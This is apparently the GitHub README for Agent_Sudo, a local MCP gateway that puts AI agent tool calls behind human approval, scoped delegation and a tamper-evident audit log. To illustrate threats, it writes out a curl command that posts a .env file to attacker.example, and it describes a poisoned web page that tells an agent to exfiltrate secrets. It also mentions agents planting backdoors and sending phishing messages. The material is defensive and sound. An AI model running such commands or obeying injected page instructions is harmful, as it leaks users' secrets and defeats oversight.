Skip to content

Kisyntra/Agent_Sudo

Agent_Sudo

Agent_Sudo logo

PyPI v0.5.0 Official MCP Registry Glama MCP Server Score License

Agent_Sudo is a local MCP permission gateway for AI agent tool calls. It lets a first-time evaluator see one high-risk action get blocked, narrowly delegated, allowed once, blocked again when the delegation is exhausted, and recorded in a tamper-evident audit log.

Evaluate Agent_Sudo in 5 Minutes

Start here if you are evaluating Agent_Sudo for the first time:

pipx install agent-sudo-mcp
agent-sudo --version

Then run the 5-minute evaluator path:

Evaluate Agent_Sudo in 5 Minutes

You should finish with this proof, without learning the internal architecture first:

blocked
↓
delegated
↓
allowed once
↓
blocked again
↓
audit verified

The evaluation uses only existing MCP server, delegation, audit-listing, audit-verification, and routing-verification functionality. If you are working from a source checkout and agent-sudo --version is stale, use python3 -m agent_sudo.gateway --version or reinstall the package in your active environment.

What You Will Validate

  • A critical shell request through agent-sudo-mcp does not execute by default.
  • A one-use delegation allows exactly one matching request.
  • The same request is denied after the delegation is consumed.
  • agent-sudo audit list shows the decisions.
  • agent-sudo verify-audit verifies the hash-chained audit log.
  • agent-sudo verify-routing reports configured routing and audit signals without claiming complete protection.

What Agent_Sudo Protects / Does Not Protect

What it is: a policy-and-provenance gateway with human approval gates, scoped delegation, and a tamper-evident (hash-chained) audit log — for the tool calls routed through it.

Protects:

  • Excessive agency — sensitive/critical actions (shell, critical file writes, external posts) require human approval before they run.
  • Untrusted-origin actions — actions whose provenance is external content (e.g. a fetched web page) are escalated or denied based on where the instruction came from, not its wording.
  • Tamper-evident audit — every decision is recorded to a SHA-256 hash-chained log that agent-sudo verify-audit can check for after-the-fact edits.
  • Scoped delegation — temporary, resource-limited tokens grant narrow access that expires automatically.

Does not protect:

  • Tools that bypass the gateway — a client's native tools or other MCP servers that don't route through Agent_Sudo are neither gated nor audited.
  • Prompt injection as a content-security problem — Agent_Sudo does not reliably detect injected instructions in prose. The built-in phrase detector is a best-effort tripwire that flags a few literal strings; the real protection is provenance-based escalation, not text matching.
  • OS-level isolation — it is not a sandbox; pair it with Docker/Firecracker for filesystem/process containment.
  • A compromised local environment — anyone with your local shell can approve pending actions or edit config directly.

See Trust Boundaries for the full table and the Security & Threat Model.

MCP Client Setup

After the 5-minute evaluation, wire the published MCP server into your MCP client:

pipx install agent-sudo-mcp
agent-sudo --version
agent-sudo init-approval
agent-sudo workspace set /ABS/PATH/TO/your/project
which agent-sudo-mcp

Add Agent_Sudo to Claude Desktop at ~/Library/Application Support/Claude/claude_desktop_config.json, using the absolute path returned by which agent-sudo-mcp:

{
  "mcpServers": {
    "agent-sudo": {
      "command": "/ABS/PATH/TO/agent-sudo-mcp",
      "args": []
    }
  }
}

Restart Claude Desktop, ask it to use an Agent_Sudo tool, then verify the action was routed through the gateway:

agent-sudo audit list

If the action is not listed, it bypassed Agent_Sudo. For the full setup and trust-boundary details, see the Claude Desktop Setup Guide.

Discoverability & Registry Status


Evaluation Story

Agent_Sudo Demo

A first-time MCP developer should evaluate one narrow story:

1. blocked: a critical shell request is not executed by default
2. delegated: the user grants one scoped, one-use token
3. allowed once: the exact matching request executes once
4. blocked again: the same request is denied after token exhaustion
5. audit verified: the decision log is listed and hash-chain verified

That story is the product activation path. Broader integration guides are reference material after this succeeds.


Supported Framework Examples

Agent_Sudo has pre-built example templates showing in-process integration for major Python agent frameworks:

  • OpenAI Agents SDK — pre-wrapping assistant tool functions.
  • PydanticAIcanonical end-to-end dogfood: a real (deterministic, offline) agent loop driving gateway decisions, real file I/O, scoped delegation, and verified audit.
  • LangGraph — securing tool node execution and graph states (examples/langgraph_integration.py).
  • agent-runtimes — registering the local tool hooks handler in config.

Why Agent_Sudo If I Already Use Docker?

A common question from security engineers and developers is: "Why do I need a policy gateway if I am already isolating my agents in a Docker container, gVisor sandbox, or Firecracker microVM?"

The difference is a separation of concerns:

  • Docker/Firecracker/Sandboxes answer: "Where can code run?" They isolate the process from the host operating system, preventing an agent from escaping to your local machine, but they do not monitor what the agent is doing inside the sandbox.
  • Agent_Sudo answers: "Should this action be allowed?" It operates at the intent and application logic level, evaluating the context, provenance, and authorization rules of individual actions before execution.

Practical Examples

Even inside a perfectly isolated Docker container, an agent with raw tool access can:

  1. Exfiltrate Secrets: Run curl -X POST -d @.env https://attacker.example to leak your API keys. A VM allows outbound network requests by default; Agent_Sudo detects the source trust and target, blocking the exfiltration.
  2. Write/Inject Code: Edit your project's main.py to insert a backdoor or dependency. While Docker prevents host pollution, it cannot prevent the agent from corrupting your project workspace. Agent_Sudo flags critical file edits and requires human confirmation.
  3. Perform Social Engineering: Send automated emails, Slack messages, or Discord alerts to external users containing phishing links under the guise of the agent owner. Agent_Sudo gates communication tools based on user approvals.
  4. Exceed Delegation Scopes: An agent running a automated build pipeline might accidentally or maliciously call tools outside its intended scope. Agent_Sudo uses temporary delegation tokens to automatically lock the agent out once its quota or time-to-live expires.

These two layers are complementary: use Docker/VM sandboxes to isolate environment resources, and use Agent_Sudo to validate tool execution intent. For a detailed technical breakdown, see Agent_Sudo vs. Container/VM Sandboxes.


Important

Security Boundaries Notice:

  • Gateway, Not a Sandbox: Agent_Sudo is a local permission gateway and policy engine; it is not an OS-level sandbox or container. It gates tool access but does not isolate filesystem or process resources.
  • Best-Effort Shell Filtering: Shell command policy checks are best-effort unless reinforced by OS-level containment or custom runtime sandboxes.
  • Client Runtime Bypass: Native tools registered directly in host runtimes (e.g., Eino, Hermes) can bypass Agent_Sudo entirely unless those tools are disabled or explicitly routed through this gateway.

Trust Boundaries: What Is and Is Not Protected

Agent_Sudo only sees the tool calls that are routed through it. This is the single most important thing to understand before relying on it.

✅ Protected ❌ Not protected
Tool calls made through the agent-sudo MCP server (file reads/writes, shell, network) — gated, classified, and logged A client's own native/built-in tools (e.g. Claude Desktop's built-in file or web tools) that don't go through the agent-sudo server
Any runtime where dangerous tools are disabled or explicitly proxied through the gateway Other MCP servers you've installed that expose filesystem/shell/network directly to the agent
Intent-level decisions: provenance, approval gates, delegation scopes, audit OS-level isolation (use Docker/VM for that — see comparison)

How to make sure you're actually protected:

  1. Route the agent's risky capabilities through the agent-sudo MCP server (see the Claude Desktop Setup Guide).
  2. Disable or remove other tools that grant the agent direct file/shell/network access and bypass the gateway.
  3. Verify with the audit log. Ask the agent to perform an action, then run agent-sudo audit list. If the action is recorded, it went through the gateway. If it is not in the log, it bypassed Agent_Sudo and was not protected — that capability still needs to be disabled or routed through the gateway.

This is a deliberate scope choice, not a defect: Agent_Sudo governs intent and authorization for the tools it mediates. Pair it with OS-level isolation (Docker/Firecracker) for environment containment.


Core Features

  • Approval Gates: Prompts for interactive confirmation (CLI yes/no) on sensitive actions, and requires a local passphrase for critical actions (e.g., running shell commands).
  • Protected Reads: Automatically blocks reads targeting private files such as credentials, configuration folders, and shell startup scripts.
  • Critical Write Detection: Upgrades ordinary file writes to critical status if the target is executable code or configuration files.
  • Scoped Delegation: Allows humans to issue temporary, resource-limited permission tokens (e.g., allow read access to /path/to/project for 2 hours, max 10 uses).
  • Audit Logs: Records all tool attempts and gateway decisions to a local JSONL log file secured with a SHA-256 hash chain to detect log tampering. Review them in a human-readable table with agent-sudo audit list, or verify integrity with agent-sudo verify-audit.
  • Claude Desktop / MCP Support: Implements the Model Context Protocol (MCP) to plug directly into Claude Desktop as a stdio server.

Additional Demos

After you complete the 5-minute evaluator path, these demos show adjacent scenarios.

Built-In Policy Demo

Run a local dry-run policy demo:

agent-sudo demo

This is useful for seeing policy decisions quickly. It is not the primary activation path because it does not show the full MCP deny -> delegate -> allow once -> deny exhausted loop.

Provenance Blocking Demo

See provenance-aware policy enforcement in ~60 seconds. An agent reads a poisoned web page that tells it to exfiltrate your .env. Agent_Sudo denies the action because its origin is untrusted external content — not because it parsed the malicious wording — while allowing the user's own work, and writes a tamper-evident audit log. The decision turns on where the instruction came from, independent of how the injection is phrased.

Agent_Sudo provenance-based blocking demo

The demo lives in the repository (it is not part of the PyPI package), so clone first:

git clone https://github.com/Kisyntra/Agent_Sudo
cd Agent_Sudo/examples/exfil_demo && python demo.py

Walkthrough and expected output: examples/exfil_demo/.


Contributor Setup

If you are developing Agent_Sudo or integrating it with a custom runtime:

# Clone the repository
git clone https://github.com/Kisyntra/Agent_Sudo.git
cd Agent_Sudo

# Install in editable mode
python3 -m pip install -e .

To run unit tests:

python3 -m unittest discover -s tests

Ecosystem

We work with agent runtime maintainers and external implementers to define portable authorization and audit standards:

  • Official Integrations:
    • agent-runtimes — Merged (PR #98) local plugin hook handler (agent_sudo_local).
  • Active Implementations:
    • LexFlow — In-progress design review (#124) for native JS/TS client audit logging and verification.
  • Research & Local PoC:
    • Hermes — Experimental architecture research (#34992) targeting registry-level dispatch gating.
  • Public Listings:

For a full compatibility matrix and integration details, see the Ecosystem Status Guide.


Documentation Directory

Directory / Section Topic Key Files
Evaluation First-time activation path Evaluate in 5 MinutesFirst Run Reference
Troubleshooting Diagnostics and resolution steps docs/troubleshooting.md
Integrations Connecting to runtimes and IDEs docs/integrations/overview.mdEcosystem StatusOutreach PlaybookAdoption DashboardDiscoverability NotesLexFlow ReadinessLexFlow ChecklistClaude DesktopMCP Setupagent-runtimesHermes (Research)
Framework Integrations Direct SDK gating for agent frameworks LangGraph Integration Guideexamples/langgraph_integration.py
Architecture Abstractions and core pipelines docs/architecture/overview.mdLayered ArchitectureEnforcement Model
Specifications Language-agnostic standard models spec/runtime_compatibility_levels.mdUniversal SchemaPolicy & AuditInteroperability Test Kit
Security Threat modeling and limits docs/architecture/security_model.md
Comparisons Policy vs Container Sandboxes Docker & Firecracker comparison

CI/CD & Release Automation

Agent_Sudo uses GitHub Actions to automate checks and distribution:

  • Continuous Integration: The CI workflow runs on all pushes and pull requests targeting the main branch, running the unittest suite, scanning for personal path disclosures, executing git diff --check whitespace validation, and verifying Python package compilation.
  • Automated Releases: Releases are generated automatically when a git tag matching v* is pushed.
    • Release candidate tags (e.g. v0.4.0-rc12) are published as GitHub Prereleases and are explicitly excluded from being marked as the latest release.
    • Release notes are automatically parsed and extracted from the matching version entry in CHANGELOG.md.